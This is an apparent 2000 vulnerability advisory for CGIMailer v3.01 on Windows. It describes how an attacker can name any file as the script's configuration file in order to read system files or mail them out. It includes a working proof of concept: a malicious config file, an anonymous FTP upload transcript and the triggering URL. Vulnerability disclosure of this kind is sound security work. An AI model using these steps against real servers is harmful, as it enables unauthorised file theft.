Advisory: CGIMailer v3.01 for Windows 95/98/2000/NT4.0
Chopsui-cide[MmM]
The Mad Midget Mafia - http://midgets.box.sk/
=======================================================================

Summary:
==========
Date released: 15/03/2000 (dd/mm/yyyy).
Risk: reading of private files.
Vulnerability found by: Chopsui-cide.
Vulnerable: CGIMailer v3.01, probably prior versions (not tested).
Immune: ?

CGIMailer makes use of configuration files which specify certain
variables (address to post to, etc). An attacker can specify his/her
own configuration file.

Details:
==========
Anyone who can execute CGIMailer (anyone who can use the forms that use
CGIMailer) can specify what configuration file to use and this can
be any file on the system CGIMailer is running on. This allows for the
existance of private files to be detected.
There are more dangerous implications though: this vulnerability could
possibly be exploited to obtain private files from the target system.
If there is an FTP server running on the target system on which an
attacker has upload priviledges, he/she could upload a malicious
configuration file, and then run it using CGIMailer. Configuration
files can be used to send files to the attacker via e-mail (among
other things).

Implementation:
=================
To demonstrate this problem, I set up Xitami Webserver + Serv-U FTP 2.5d.
The target host is therocksays.

We have anonymous FTP access in Serv-U FTP with upload priviledges to
the incoming directory, and Xitami will allow us to execute CGI
scripts. This is all we will need to execute the attack.

Here is the configuration file that will send us the contents of
autoexec.bat:

GATEWAY=notneeded.com
PORT=25
FROM=nobody@isp.com
TO=nobody@isp.com
SUBJECT=CGIMailer form
RESPONSE_TEMPLATE=c:\autoexec.bat
REFBASE_ALLOW=

Now to upload it...

D:\>ftp therocksays
Connected to therocksays.
220 Serv-U FTP-Server v2.5d for WinSock ready...
User (therocksays:(none)): anonymous
331 User name okay, please send complete E-mail address as password.
Password:
230 User logged in, proceed.
ftp> dir
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
drwxrwxrwx   1 user     group           0 Mar 15 06:28 incoming
226 Transfer complete.
65 bytes received in 0.00 seconds (65000.00 Kbytes/sec)
ftp> cd incoming
250 Directory changed to /d:/ftproot/incoming
ftp> put test.cf
200 PORT Command successful.
150 Opening ASCII mode data connection for test.cf.
226 Transfer complete.
150 bytes sent in 0.06 seconds (2.50 Kbytes/sec)
ftp> pwd
257 "/d:/ftproot/incoming" is current directory.
ftp>

Serv-U was even kind enough to give us the local path of the config
file. Now all we need to do is point our browser at:
http://therocksays/cgi-bin/cgimail?d:\ftproot\incoming\test.cf

The contents of autoexec.bat should be listed at the top of the
resulting HTML file. This could have been e-mailed as an attachment
to any address we wanted.

=======================================================================